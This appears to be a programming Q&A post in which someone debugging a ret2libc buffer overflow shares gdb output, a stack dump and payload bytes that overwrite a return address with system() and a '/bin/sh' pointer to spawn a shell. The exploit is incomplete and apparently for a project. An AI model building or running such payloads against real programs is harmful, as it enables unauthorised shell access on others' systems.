I am trying to do a buffer overflow for a project. The buffer needs to overflow to /bin/sh. I have found the correct return address, but I do not seem to be successfully getting an overflow.
Program received signal SIGSEGV, Segmentation fault. 0xb7fbc544 in msg (params) at myfile.c:167 167 msg_length = ctx->backend->send_msg_pre(msg, msg_length); (gdb) backtrace #0 0xb7fbc544 in msg (params) at myfile.c:167 #1 0xb7fbc869 in my_function(params) at myfile.c:912 #2 0xb7e4c190 in ?? () at ../sysdeps/unix/sysv/linux/system.c:76 from /lib/i386-linux-gnu/libc.so.6 Backtrace stopped: previous frame inner to this frame (corrupt stack?)
To find the /bin/sh I followed this post:
(gdb) print &system $15 = (<text variable, no debug info> *) 0xb7e4c190 <__libc_system> (gdb) find &system,+9999999,"/bin/sh" 0xb7f6ca24 warning: Unable to access 16000 bytes of target memory at 0xb7fc292c, halting search. 1 pattern found. (gdb)
I have found the return address and verified it is correct (if I replace it with a different function it calls that function). The original return address is bolded
0xbffff690: 0x90909090 0x90909090 0x90909090 0xb7e4c190
0xbffff6a0: 0xb7f6ca24 0x0804c050 0x0000004d 0x0804c158
The payload I sent was 0xb7e4c190 0xb7f6ca24 50
This overflow is a bit more tricky than others, because I need to do some padding to it in the front and the back. The way the item I am overflowing works is that it sets 6 bytes, so each set will take up a portion of one address and another.
I think the problem is that I have to overflow the last byte. I matched what it was originally, but that does not seem to work:
payload = payload + ['\x90'] + ['\xc1'] + ['\xe4'] + ['\xb7'] payload = payload + ['\x24'] + ['\xca'] + ['\xf6'] + ['\xb7'] + ['\x50']
Is there something I am missing here? Because the stack does not show the /bin/sh call in the overflow, I feel like that is not correct.
User contributions licensed under CC BY-SA 3.0